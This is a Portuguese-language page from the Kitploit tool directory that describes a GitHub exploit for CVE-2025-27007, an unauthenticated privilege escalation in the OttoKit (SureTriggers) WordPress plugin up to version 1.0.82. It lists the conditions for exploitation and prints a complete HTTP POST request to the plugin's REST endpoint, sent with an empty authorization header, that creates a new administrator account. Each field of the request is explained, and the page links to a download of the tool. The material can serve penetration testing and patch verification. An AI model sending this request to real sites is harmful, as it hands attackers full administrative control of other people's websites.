Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-27007-OttoKit-exploit — explorando o CVE-2025-27007, uma vulnerabilidade crítica de escalonamento de privilégios sem autenticação no plugin OttoKit (anteriormente SureTriggers) do WordPress | Kitploit
Ferramentas/GitHubGitHub/absholi7ly/cve-2025-27007-ottokit-exploit
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoRed Teaming
GitHubabsholi7ly/cve-2025-27007-ottokit-exploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-27007-OttoKit-exploit

explorando o CVE-2025-27007, uma vulnerabilidade crítica de escalonamento de privilégios sem autenticação no plugin OttoKit (anteriormente SureTriggers) do WordPress

Ver Repositório
21há 1 anoAinda não revisado

CVE-2025-27007: OttoKit (SureTriggers) Vulnerabilidade de Escalação de Privilégios

Exploração da CVE-2025-27007, uma vulnerabilidade crítica de escalação de privilégios não autorizada no plugin OttoKit (anteriormente conhecido como SureTriggers) para WordPress. Este repositório descreve como um atacante pode criar uma conta de administrador em um site WordPress vulnerável.

Versões Afetadas

  • Todas as versões do OttoKit (SureTriggers) ≤ 1.0.82.
  • Corrigido na versão 1.0.83.

Condições para Exploração

A vulnerabilidade pode ser explorada nas seguintes circunstâncias:

  1. O OttoKit deve estar instalado e ativado no site WordPress alvo.
  2. O plugin não inicializado (por exemplo, nenhuma chave de API ou "secret_key" está definida no banco de dados).
  3. O site alvo expõe o endpoint da API REST '/wp-json/sure-triggers/v1/automation/action'.

Requisição HTTP

A seguinte requisição visa o endpoint /wp-json/sure-triggers/v1/automation/action para criar uma conta de administrador:

root@kitploit:~
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization: 
Content-Length: [length]

selected_options[user_name]=new_admin&selected_options[user_email][email protected]&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists


Explicação da Requisição

  • Endpoint: POST /wp-json/sure-triggers/v1/automation/action

  • St-Authorization: (vazio): Ignora a autenticação quando o plugin não está configurado.

  • selected_options[user_name]: Nome de usuário para a nova conta (por exemplo, new_admin).

  • selected_options[user_email]: E-mail para a nova conta (por exemplo, [email protected]).

  • selected_options[password]: Senha para a nova conta (por exemplo, StrongP@ssw0rd123).

  • selected_options[role]: Defina como administrator para conceder privilégios totais.

  • type_event: Defina como create_user_if_not_exists para acionar a criação do usuário.

Baixar ferramenta